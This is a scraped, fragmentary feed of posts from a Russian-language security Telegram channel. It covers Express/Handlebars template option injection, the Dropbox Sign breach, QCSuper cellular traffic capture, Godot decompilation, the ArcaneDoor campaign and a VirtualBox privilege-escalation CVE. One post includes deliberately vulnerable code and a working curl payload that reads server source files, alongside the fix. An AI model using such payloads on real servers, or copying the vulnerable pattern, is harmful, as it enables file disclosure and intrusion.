Cybred
- Підписники
- Перегляди допису
- ER - коефіцієнт залучення
Триває завантаження даних...
Триває завантаження даних...
npx express-generator
express --view hbs
Бонусом получаешь LFR и, потенциально, RCE.
Пример непримечательного кода
var express = require('express');
var router = express.Router();
router.post('/', function(req, res, next) {
var profile = req.body.profile
res.render('index', profile)
});
module.exports = router;
А теперь эксплойт для LFR, чтобы прочитать исходники
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://localhost:9090/'
Внутри миддлвары, в процессе рендера, на самом деле существует параметр layout
, который получается переопределить, благодаря нашему переданному словарю.
С точки зрения кода, вместо
res.render('index', profile)
Правильно использовать
res.render('index', { profile })
Но даже так остается риск эксплуатации с помощью классического Prototype Pollution.Злоумышленники взломали учетную запись службы в бэкенде Sign, у которой были привилегии для выполнения различных действий в продакшн среде. Затем они использовали этот доступ для получения доступа к базе данных клиентов.
В ходе расследования выяснилось, что злоумышленники получили доступ к данным, включая информацию о клиентах: электронную почту, имена пользователей, номера телефонов и хэшированные пароли.
Кроме того, были скомпрометированы настройки информация о настройках, и информация об аутентификации, например, API-ключи, OAuth-токены и данные о многофакторной аутентификации пользователей.Dropbox Sign взломали и слили всю базу, включая секреты для TOTP. Sign — это сервис, через через который можно шарить и подписывать документы онлайн.
Information on a security incident involving Dropbox Sign.
/dev/diag
.
Умеет он много, например:
— отдавать информацию об устройстве
— выполнять команды, связанные с вызовами и сообщениями
— взаимодействовать с GPS
— работать с протоколами 2G/3G/4G
— менеджить файлы на крошечной EFS
— читать и писать в постоянную и энергозависимой память
QCSuper — это утилита, которая позволяет взаимодействовать с ним, и использовать некоторые его фичи — например, перехватывать сырой 2G/3G/4G трафик, чтобы проанализировать его в Wireshark.
Достаточно иметь рутованный смартфон и подключиться по ADB, вот пример использования
sudo ./qcsuper.py --adb --wireshark-live
О том, как это работает низкоуровневого, и что можно увидеть в трафике, читаем тут Presenting QCSUPER: A tool for capturing your 2G/3G/4G air traffic on QUALCOMM-based phones.QCSuper is a tool communicating with Qualcomm-based phones and modems, allowing to capture raw 2G/3G/4G radio frames, among other things. - P1sec/QCSuper
Linux Forensic in a nutshell: Validate compromised Interviewing client/user/administrator (what, why, how, when, where, who?) Live response co...
pck
/exe
/apk
, на выходе возвращает восстановленный проект, готовый для импорта в игровой движок.
Пример использования
gdre_tools --headless --recover=game.exe
Godot reverse engineering tools. Contribute to bruvzg/gdsdecomp development by creating an account on GitHub.
host-scan-reply
(участвует при создании сеанса SSL VPN) на собственный интерпретатор шеллкода.
В январе уже массово взламывали сервера Ivanti Connect Secure, которые некоторые связывают с этой же группой.ArcaneDoor is a campaign that is the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns.
Tool to find common vulnerabilities in cryptographic public keys - badkeys/badkeys
SYSTEM
с помощью VirtualBox. Эксплуатация Arbitrary File Write/Delete с помощью симлинков, \RPC Control\
, в связке с DLL Hijacking.
Ресерч: https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/